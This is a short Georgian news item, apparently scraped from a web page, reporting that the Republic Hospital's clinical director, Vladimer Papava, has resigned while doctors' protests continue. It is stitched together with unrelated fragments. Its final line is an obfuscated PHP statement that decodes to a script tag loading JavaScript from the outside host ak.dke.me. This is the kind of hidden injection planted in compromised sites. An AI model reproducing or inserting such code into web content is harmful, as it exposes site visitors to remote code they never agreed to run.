celsiusi
ავერსი შნაიდერი

რესპუბლიკური საავადმყოფოს კლინიკურმა დირექტორმა ვლადიმერ პაპავამ თანამდებობა დატოვა.

როგორც მან „ინტერპრესნიუსს“ განუცხადა, დაკავებული თანამდებობა მან დღეს, საკუთარი განცხადების საფუძველზე დატოვა.

„დავწერე განცხადება წასვლასთან დაკავშირებით. დღეს გადავწყვიტე. დღეიდან აღარ ვარ კლინიკური დირექტორი“, - განაცხადა პაპავამ.

რესპუბლიკურ საავადმყოფოში ექიმების პროტესტი გრძელდება. მედპერსონალის მთავარი მოთხოვნაა, კლინიკის რეაბილიტაციის პარალელურად მუშაობა უწყვეტ რეჟიმში განაგრძონ.

385
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");